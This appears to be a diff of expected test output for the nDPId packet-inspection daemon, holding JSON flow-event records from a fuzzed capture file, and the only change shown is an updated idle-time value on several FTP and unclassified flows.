00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469781470,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1360,28 +1360,28 @@ 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
-00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
+00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by 
port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 